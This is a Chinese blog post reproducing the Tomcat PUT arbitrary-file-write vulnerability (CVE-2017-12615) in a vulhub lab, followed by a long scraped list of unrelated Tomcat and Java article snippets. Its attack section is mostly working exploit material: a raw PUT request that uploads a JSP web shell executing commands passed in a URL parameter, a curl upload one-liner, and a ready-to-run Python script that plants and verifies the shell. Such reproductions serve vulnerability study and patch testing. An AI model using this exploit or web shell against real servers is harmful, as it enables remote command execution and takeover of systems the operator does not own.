努力的学渣'#
努力的学渣'#

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

当 Tomcat启用了HTTP PUT请求方法并且将 readonly 初始化参数由默认值设置为 false,就能执行任意文件写入漏洞

Tomcat 版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,所以默认配置条件下不受此漏洞影响。
配置文件为 \conf\web.xml
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第1张图片

利用vulhub搭建漏洞环境 目录为tomcat/CVE-2017-12615 环境启动成功
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第2张图片

  • 直接构造如下exp
PUT /shell1.jsp/ HTTP/1.1
Host:目标ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 417

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("
");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("
");
    } 
%>

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第3张图片

也可以用linux的curl进行put写入木马

curl -XPUT 目标ip/aufeng.jsp/ --data "aufeng"

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第4张图片

直接打脚本,原理就是构造一个请求包。
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第5张图片

脚本如下:

import requests
import sys
import time

'''
Usage:
	python CVE-2017-12615.py http://127.0.0.1

	shell: http://127.0.0.1/shell.jsp?pwd=AF&cmd=whoami


'''

def attack(url):
	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
	headers={"User-Agent":user_agent}
	data="""<%
    if("AF".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("
");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("
");
    }
%>"""
	try:
		requests.put(url, headers=headers, data=data)

		time.sleep(2)

		verify_response = requests.get(url[:-1], headers=headers)

		if verify_response.status_code == 200:
			print 'success!'
		else :
			print verify_response.status_code

	except :
		"error"

if __name__ == '__main__':
	target_url = sys.argv[1] + '/shell.jsp/'

	attack(target_url)
	print 'shell: ' + target_url[:-1]

你可能感兴趣的:(复现漏洞,tomcat,CVE-2017-12615)

  • struts2 工布之者 strutsstruts
    s2的工作原理(图解)详解Struts2的工作原理上图来源于Struts2官方站点,是Struts2的整体结构。一个请求在Struts2框架中的处理大概分为以下几个步骤1客户端初始化一个指向Servlet容器(例如Tomcat)的请求2这个请求经过一系列的过滤器(Filter)(这些过滤器中有一个叫做ActionContextCleanUp的可选过滤器,这个过滤器对于Struts2和其他框架的集成
  • The selected directory is not a valid Tomcat home 六件套是我 tomcatjava
    我这里是Ubuntu安装的tomcat,直接从压缩包解压安装的IDEA在配置TomcatHome的时候,其实路径是对的,我填的是/usr/local/tomcat/apach-tomcat-9.0.98。但是报错TheselecteddirectoryisisnotavalidTomcathome。**解决方法:**只需要给tomcat目录足够的权限就好。sudochmod777./apach-t
  • JMeter在Mac下的安装使用 晓风残月Yuperman 系统安全软件工程jmeter
    博主介绍:大家好,我是想成为Super的Yuperman,互联网宇宙厂经验,17年医疗健康行业的码拉松奔跑者,曾担任技术专家、架构师、研发总监负责和主导多个应用架构。技术范围:目前专注java体系,有多年java、golang、.Net、DDD、软件架构、redis、nginx、tomcat、mysql、oracle等经验业务范围:对传统业务应用技术转型,从数字医院到区域医疗,从院内业务系统到互联
  • java常见单词汇总3(非常使用哦) 糟糕透了的都精彩极了 学习javajava常用英文单词
    JSP中常用英文URL:UniversalResourceLocation:统一资源定位符IE:InternetExplorer因特网浏览器JSP:javaserverpage.java服务器页面Model:模型View:视图C:controller:控制器Tomcat:一种jsp的web服务器WebModule:web模块Servlet:小服务程序Request:请求Response:响应Ini
  • tomcat:Caused by:java.lang.ClassNotFoundException: javax.servlet.ServletContextListener解决方法 码农研究僧 BUGjavatomcatspringmaven
    目录1.找主问题2.普通方法3.进阶方法1.找主问题出现以下问题大概是在终端中这样显示让你去查看日志[2021-08-1909:20:24,031]Artifactssm项目:warexploded:Artifactisbeingdeployed,pleasewait...19-Aug-202121:20:26.871信息[RMITCPConnection(3)-127.0.0.1]org.apa
  • 如何快速在linux服务器部署java运行环境(JDK+TomCat+Redis+Mysql+Nginx) Noobwali javatomcatlinux
    一.jdk和Tomcat1.jdk安装tar-zxv-fjdk-8u231-linux-x64.tar.gz2.配置环境变量vim/etc/profileJAVA_HOME=/java_source/jdk1.8.0_231(这里填写你的路径,后面不变)PATH=JAVAHOME/bin:JAVA_HOME/bin:JAVAHOME/bin:PATHCLASSPATH=JAVAHOME/jre/l
  • Linux 部署 Java 项目:Tomcat、Redis、MySQL 教程 lingllllove javalinuxtomcat
    在Linux服务器上部署Java项目通常需要配置应用服务器(如Tomcat)、数据库(如MySQL)和缓存服务器(如Redis)。本文将详细介绍如何在Linux环境中部署一个Java项目,涵盖Tomcat、Redis和MySQL的安装与配置。一、准备工作在开始之前,确保你拥有以下条件:一台运行Linux的服务器(本文以Ubuntu为例)。具有sudo权限的用户。安装好Java环境(JDK)。安装J
  • 性能测试了解服务架构 吾爱乐享 性能测试tomcat服务架构
    软件架构与部署性能测试软件服务架构一般分为,最外层lvs-nginx-tomcat-redis-mysqlmermaidgraphLRlvs-->nginx主1-->tomcat1-->redis1-->mysql1nginx主1-->tomcat2-->redis1lvs-->nginx主2-->tomcat3-->redis2-->mysql2nginx主2-->tomcat4-->redis
  • Jetty切Tomcat部署应用之根路径/总是跳转index页面 upcdxlq tomcatjava服务器
    问题描述项目之前在Jetty下运行的,http://ip:port/context/原本是进入到Controller的@RequestMappin(“/”)方法的,但部署到Tomcat下,总是跳转到index.jsp问题分析1、访问应用的其他路径都正常,这个请求压根没有得到DispatchServlet处理,默认返回index.jsp,应该是tomcat配置问题2、那是不是应用的web.xml里配
  • tomcat的accept-count、max-connections、max-threads三个参数的含义 shuair java多线程tomcatjava
    tomcat的accept-count、max-connections、max-threads三个参数的含义tomcat的accept-count、max-connections、max-threads三个参数的含义max-connections:最大连接数最大连接数是指,同一时刻,能够连接的最大请求数需要注意的是,能够连接并不代表可以立即处理,可以立即处理请求的受最大线程数的控制accept-c
  • 各类运维工具下载地址维护 容器云服务 运维
    tomcat:Indexof/dist/tomcat/tomcat-8Indexof/dist/tomcat/tomcat-9Indexof/dist/tomcat/tomcat-10jdk:JavaDownloads|Oracle
  • Tomcat调优相关理解 smile_life_ javatomcattomcat调优
    什么是QPS?是QueriesPerSecond的缩写,是指服务器每秒查询数,比如定义一个a接口,该接口是10QPS,那么就是指该接口每秒可以处理10个请求springboot默认并发处理数是多少?springboot并发处理要看servlet容器,而servlet容器默认是Tomcat,而Tomcat容器可以处理的并发请求数主要受到最大线程数(max-threads)的限制,Tomcat的默认最
  • Web 应用服务器:Tomcat环境变量配置、Intellij idea配置Tomcat及运行JavaWeb项目测试 啊Q老师 Java开发技术从零到壹#JavaWeb篇tomcat服务器intellij-idea
    TomcatTomcat环境变量配置Intellijidea配置TomcatTomcat运行JavaWeb项目测试上篇文章中,我们简单地学习了Tomcat服务器简介、下载、安装及控制台中文乱码化脓性解决的内容,现在我们继续学习Tomcat的配置及测试。Tomcat环境变量配置首先,点击我的电脑—>属性—>高级系统设置—>环境变量(N)…,在系统变量中新建两个系统变量。变量名:CATALINA_BA
  • IDEA tomcat启动项目 Aa_duidui javaintellij-ideatomcatjava
    1.打开File中Settings2.搜索ApplicationServers,添加服务器类型,tomcat,选择本地的tomcat文件位置,点击OK3.搜索Plugins,在里面搜索tomcat,挑上钩4.idea打开多个项目点击idea侧面的Maven,点击加号,找到要添加项目的pom.xml项目是现成的,省略了文章的第5步
  • grafana+prometheus+nginx监控负载均衡 杰森斯坦森1150 性能测试#性能监控工具nginxlinux
    目录一、安装java项目二、安装nginx三、安装nginx-vts-export四、配置nginx五、启动nginx-vts-export六、安装promethus七、安装grafana一、安装java项目安装jdk,安装tomcat,请参看文章一台linux服务器上配置多台tomcat二、安装nginx请参考文章Linux安装nginx步骤三、安装nginx-vts-export1.安装git
  • Tomcat 启动报错 : There is insufficient memory for the Java Runtime Environment to continue m0_74825614 javatomcat开发语言
    Tomcat启动报错“ThereisinsufficientmemoryfortheJavaRuntimeEnvironmenttocontinue”通常表示JVM(Java虚拟机)在尝试分配内存时遇到了问题。这通常是由于以下原因之一:系统内存不足:你的物理内存不足以满足JVM的内存需求。JVM参数设置不当:你为JVM设置的内存参数可能过高,超过了系统的可用内存。其他进程占用了大量内存:系统中运行
  • nginx闲谈 沉默monkey nginx运维
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录介绍特点高并发轻量级模块化设计应用场景web服务器反向代理正向代理(类似机场)配置demo负载均衡缓存处理https与ssl/tlsapi网关介绍nginx高性能(同比tomcat性能高20%),轻量的weib服务器和反向代理服务器,能解决大量并发连接(C10K问题),高并发,高可靠,低内存消耗,支持多功能模块(如前端静态资源
  • 基于springbootBBS论坛系统的设计与实现 四金学长 计算机毕业设计参考案例springbootmavenjavaBBS论坛系统
    1.引言在当今的软件开发领域,企业级应用的开发和部署速度直接影响着业务的竞争力。SpringBoot以其轻量级、快速启动和强大的集成能力,成为构建现代企业级应用的首选框架。本文将带您深入了解SpringBoot框架的核心特性,并展示如何利用它构建一个高效、可扩展的系统。2.开发环境开发语言:Java框架:springbootJD版本:JDK1.8服务器:tomcat7数据库:mysql5.7(一定
  • Tomcat日志文件详解及catalina.out日志清理方法 m0_74824802 tomcatjava
    目录前言1.Tomcat日志文件详解1.1catalina.out1.2localhost_access_log1.3catalina..log1.4host-manager..log和manager..log1.5localhost..log2.catalina.out文件管理与清理方法2.1为什么不能直接删除catalina.out文件2.2正确清空catalina.out文件的方式2.3自动
  • SSM项目中的Tomcat配置详细教学及启动失败原因总结 高危型 tomcatjava
    一个小学弟找到我说ssm项目不会配tomcat,老出问题,记录一下。为了成功启动一个SSM项目,正确配置Tomcat是至关重要的一步。介绍SSM项目中Tomcat的配置步骤,并总结一些常见的启动失败原因及解决方法,帮助·同学们方便应对课程设计一、Tomcat配置详细教学1.1安装和配置Tomcat1.1.1下载和安装Tomcat下载Tomcat:访问ApacheTomcat官网,下载适合你系统版本
  • SpringBoot项目修改内置tomcat版本 egegerhn javajava后端
    覆盖掉tomcat版本8.5.51org.apache.tomcat.embedtomcat-embed-core${tomcat.version}org.apache.tomcattomcat-juli${tomcat.version}忽略掉spring-boot-starter-web里的tomcatorg.springframework.bootspring-boot-starter-web
  • 【Tomcat】Tomcat整体架构及其设计精髓分析(上) 金鳞踏雨 图灵课堂学习笔记tomcat架构java容器Servlet
    【Tomcat】Tomcat整体架构及其设计精髓分析(上)一、Tomcat整体架构1.什么是Tomcat2.Servlet详解Servlet接口Servlet容器工作原理Servlet代码实现3.Tomcat的目录结构4.web应用部署的方式(了解)(1)拷贝到webapps目录下(2)server.xml的Context标签下配置Context(3)在/conf/Catalina/localho
  • 深入剖析Tomcat整体架构 一休哥助手 java架构工具tomcat架构java
    目录Tomcat简介Tomcat架构概述核心组件详解ServerServiceConnectorEngineHostContextWrapper生命周期与初始化
  • Nginx介绍和入门学习 _Eden_ nginx学习运维
    一、Nginx介绍1.nginx是什么?毋庸置疑它是一个web服务器,类似的,apache、lighttpd、tomcat、jetty、IIS都是web服务器。它们都具有web服务器的基本功能:基于rest架构风格,以同意资源描述符或者统一资源定位符作为沟通的依据,通过http为浏览器邓客户端提供各种网络服务。对于上述所提到的web服务器,分别具有各自的特点和弊端例如,tomcat和jetty都是
  • 后端开发基础——JavaWeb(根基,了解原理)浓缩 Wanna715 后端开发基础javatomcatservlet后端
    总述学习Tomcat、JSON、Servlet、Filter、Session、Cookie、Ajax异步请求、RESTful接口规范、JSP(很老的技术,了解)Servlet系统架构C/S架构(Client/Server(客户端/服务器))B/S架构(Browser/Server,浏览器/服务器)javaJavaSE:Java标准版JavaEE:企业版(WEB方向,WEB系统)13种规范,其中Se
  • tomcat配置存放静态资源,实现网页访问并下载 qq_40711092 tomcatjava
    配置server.xml在server.xml文件中的Host标签下嵌入一个Context标签,path是映射的web路径,doBase是本地磁盘的物理路径。-->-->设置tomcat允许访问静态文件夹,修改web.xml文件中如下图位置将false修改为truedefaultorg.apache.catalina.servlets.DefaultServletdebug0listingstru
  • 微信小程序交易平台/基于微信小程序的购物系统/基于微信小程序的电商平台/基于微信小程序的商品销售系统 一枚小小程序员哈 微信小程序小程序
    摘要随着当今网络的发展,时代的进步,各行各业也在发生着变化,于是网络已经逐步进入人们的生活,给我们生活或者工作提供了新的方向新的可能。本毕业设计的内容是设计实现一个微信小程序交易平台。使用微信开发者是以java语言进行开发,MYSQL为数据库开发平台,Tomcat网络信息服务作为应用服务器。微信小程序交易平台的功能已基本实现,主要包括有商家、用户、商品分类、商品信息、商品咨询等功能。本微信小程序软
  • Arm64架构的Linux服务器安装tomcat并部署war包 木枫Free 服务器架构linuxtomcatarm运维
    一、下载Tomcat打开浏览器,访问ApacheTomcat官方网站。在下载页面中,选择适合arm64架构的版本。一般来说,可以选择Tomcat的二进制发行版(BinaryDistributions)中的.tar.gz压缩包。我这里下载的是tomcat9二、安装Tomcat将下载的Tomcat压缩包上传到欧鹏操作系统的服务器上,或者使用命令行工具(如wget)直接下载到服务器上。解压Tomcat压
  • Java工程结构:服务器规约(JVM 碰到 OOM 场景时输出 dump 信息、设置tomcat的 JVM 的内存参数、了解服务平均耗时) iOS逆向 Java开发的深入浅出java服务器开发语言
    文章目录I调用远程操作必须有超时设置。II推荐了解每个服务大致的平均耗时JVM的Xms和Xmx设置一样大小的内存容量让JVM碰到OOM场景时输出dump信息调大服务器所支持的最大文件句柄数(FileDescriptor,简写为fd)高并发服务器建议调小TCP协议的time_wait超时时间。III设置tomcat的JVM的内存参数查找Tomcat位置:快速定位服务状态和部署位置具体配置步骤查看JV
  • [ vulhub漏洞复现篇 ] Apache Tomcat 文件包含漏洞 (CVE-2020-1938) _PowerShell 渗透测试自学篇[靶场实战]vulhubapachetomcatjava
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录博主介绍一、漏洞简介二、漏洞编号(选填)三、漏洞靶场(选填)1.vulhub靶场环境搭建2.切换到此靶场目录3.启动靶
  • 多线程编程之卫生间 周凡杨 java并发卫生间线程厕所
    如大家所知,火车上车厢的卫生间很小,每次只能容纳一个人,一个车厢只有一个卫生间,这个卫生间会被多个人同时使用,在实际使用时,当一个人进入卫生间时则会把卫生间锁上,等出来时打开门,下一个人进去把门锁上,如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析:首先问题中有两个实体,一个是人,一个是厕所,所以设计程序时就可以设计两个类。人是多数的,厕所只有一个(暂且模拟的是一个车厢)。
  • How to Install GUI to Centos Minimal sunjing linuxInstallDesktopGUI
    http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html   I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
  • Shell 函数 daizj shell函数
    Shell 函数 linux shell 可以用户定义函数,然后在shell脚本中可以随便调用。 shell中函数的定义格式如下: [function] funname [()]{ action; [return int;] } 说明: 1、可以带function fun() 定义,也可以直接fun() 定义,不带任何参数。 2、参数返回
  • Linux服务器新手操作之一 周凡杨 Linux 简单 操作
    1.whoami      当一个用户登录Linux系统之后,也许他想知道自己是发哪个用户登录的。      此时可以使用whoami命令。      [ecuser@HA5-DZ05 ~]$ whoami       e
  • 浅谈Socket通信(一) 朱辉辉33 socket
    在java中ServerSocket用于服务器端,用来监听端口。通过服务器监听,客户端发送请求,双方建立链接后才能通信。当服务器和客户端建立链接后,两边都会产生一个Socket实例,我们可以通过操作Socket来建立通信。    首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包    ServerSock
  • 关于框架的简单认识 西蜀石兰 框架
    入职两个月多,依然是一个不会写代码的小白,每天的工作就是看代码,写wiki。 前端接触CSS、HTML、JS等语言,一直在用的CS模型,自然免不了数据库的链接及使用,真心涉及框架,项目中用到的BootStrap算一个吧,哦,JQuery只能算半个框架吧,我更觉得它是另外一种语言。 后台一直是纯Java代码,涉及的框架是Quzrtz和log4j。 都说学前端的要知道三大框架,目前node.
  • You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids  ) values('0ac91f167f754c8cbac00e9e3dc372
  • MySQL5.6的my.ini配置 aigo mysql
    注意:以下配置的服务器硬件是:8核16G内存    [client]   port=3306   [mysql]   default-character-set=utf8     [mysqld]   port=3306   basedir=D:/mysql-5.6.21-win
  • mysql 全文模糊查找 便捷解决方案 alxw4616 mysql
    mysql 全文模糊查找 便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
  • 自定义数据结构 链表(单项 ,双向,环形) 百合不是茶 单项链表双向链表
         链表与动态数组的实现方式差不多,    数组适合快速删除某个元素    链表则可以快速的保存数组并且可以是不连续的       单项链表;数据从第一个指向最后一个   实现代码:        //定义动态链表 clas
  • threadLocal实例 bijian1013 javathreadjava多线程threadLocal
    实例1: package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
  • activemq安全设置—设置admin的用户名和密码 bijian1013 javaactivemq
            ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件,找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
  • 【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
    本文详细介绍Java的范型,写一篇关于范型的博客原因有两个,前几天要写个范型方法(返回值根据传入的类型而定),竟然想了半天,最后还是从网上找了个范型方法的写法;再者,前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理,看它的源代码就比较迷糊,只其然不知其所以然。所以,还是花点时间系统的整理总结下范型吧。   范型内容 范型集合类 范型类
  • 【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
    在HBase中,每个HFile存储的是一个表中一个列族的数据,也就是说,当一个表中有多个列簇时,针对每个列簇插入数据,最后产生的数据是多个HFile,每个对应一个列族,通过如下操作验证   1. 建立一个有两个列族的表   create 'members','colfam1','colfam2'   2. 在members表中的colfam1中插入50*5
  • Nginx 官方一个配置实例 ronin47 nginx 配置实例
    user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
  • java-15.输入一颗二元查找树,将该树转换为它的镜像, 即在转换后的二元查找树中,左子树的结点都大于右子树的结点。 用递归和循环 bylijinnan java
    //use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
  • 返回null还是empty bylijinnan javaapachespring编程
    第一个问题,函数是应当返回null还是长度为0的数组(或集合)? 第二个问题,函数输入参数不当时,是异常还是返回null? 先看第一个问题 有两个约定我觉得应当遵守: 1.返回零长度的数组或集合而不是null(详见《Effective Java》) 理由就是,如果返回empty,就可以少了很多not-null判断: List<Person> list
  • [科技与项目]工作流厂商的战略机遇期 comsci 工作流
          在新的战略平衡形成之前,这里有一个短暂的战略机遇期,只有大概最短6年,最长14年的时间,这段时间就好像我们森林里面的小动物,在秋天中,必须抓紧一切时间存储坚果一样,否则无法熬过漫长的冬季。。。。         在微软,甲骨文,谷歌,IBM,SONY
  • 过度设计-举例 cuityang 过度设计
    过度设计,需要更多设计时间和测试成本,如无必要,还是尽量简洁一些好。 未来的事情,比如 访问量,比如数据库的容量,比如是否需要改成分布式  都是无法预料的 再举一个例子,对闰年的判断逻辑:   1、 if($Year%4==0) return True; else return Fasle;   2、if (   ($Year%4==0  &am
  • java进阶,《Java性能优化权威指南》试读 darkblue086 java性能优化
    记得当年随意读了微软出版社的.NET 2.0应用程序调试,才发现调试器如此强大,应用程序开发调试其实真的简单了很多,不仅仅是因为里面介绍了很多调试器工具的使用,更是因为里面寻找问题并重现问题的思想让我震撼,时隔多年,Java已经如日中天,成为许多大型企业应用的首选,而今天,这本《Java性能优化权威指南》让我再次找到了这种感觉,从不经意的开发过程让我刮目相看,原来性能调优不是简单地看看热点在哪里,
  • 网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
      协议:在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定   计算机网络的体系结构:计算机网络的层次结构和各层协议的集合。   两类服务:   面向连接的服务通信双方在通信之前先建立某种状态,并在通信过程中维持这种状态的变化,同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。   面向无连接的服务通信双方在通信前后不建立和维持状态,不为服务对象
  • mac中用命令行运行mysql dcj3sjt126com mysqllinuxmac
    参考这篇博客:http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html  感觉workbench不好用(有点先入为主了)。 1,安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/,根据我的机器的配置情况选择了64
  • MongDB查询(1)——基本查询[五] eksliang mongodbmongodb 查询mongodb find
    MongDB查询 转载请出自出处:http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....}  参数含义: query:查询参数 fie
  • base64,加密解密 经融加密,对接 y806839048 经融加密对接
    String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式,注意用于加密,解密的要是同
  • JavaWeb之JSP概述 ihuning javaweb
      什么是JSP?为什么使用JSP? JSP表示Java Server Page,即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。   JSP起源    在很多动态网页中,绝大部分内容都是固定不变的,只有局部内容需要动态产生和改变。  如果使用Servl
  • apple watch 指南 啸笑天 apple
    1. 文档 WatchKit Programming Guide(中译在线版 By @CocoaChina) 译文 译者 原文 概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
  • java经典的基础题目 macroli java编程
    1.列举出 10个JAVA语言的优势 a:免费,开源,跨平台(平台独立性),简单易用,功能完善,面向对象,健壮性,多线程,结构中立,企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包,类,接口,对象,属性,方法,构造器,继承,封装,多态,抽象,范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
  • 你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象regex
    var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
  • [一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hivehive分析表hive统计信息hive Statistics
    关键字:Hive统计信息、分析Hive表、Hive Statistics   类似于Oracle的分析表,Hive中也提供了分析表和分区的功能,通过自动和手动分析Hive表,将Hive表的一些统计信息存储到元数据中。   表和分区的统计信息主要包括:行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等;   14.1 新表的统计信息 对于一个新创建
  • Spring Boot 1.2.5 发布 wiselyman spring boot
        Spring Boot 1.2.5已在7月2日发布,现在可以从spring的maven库和maven中心库下载。   这个版本是一个维护的发布版,主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。   官方建议所有的Spring Boot用户升级这个版本。   项目首页 | 源
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他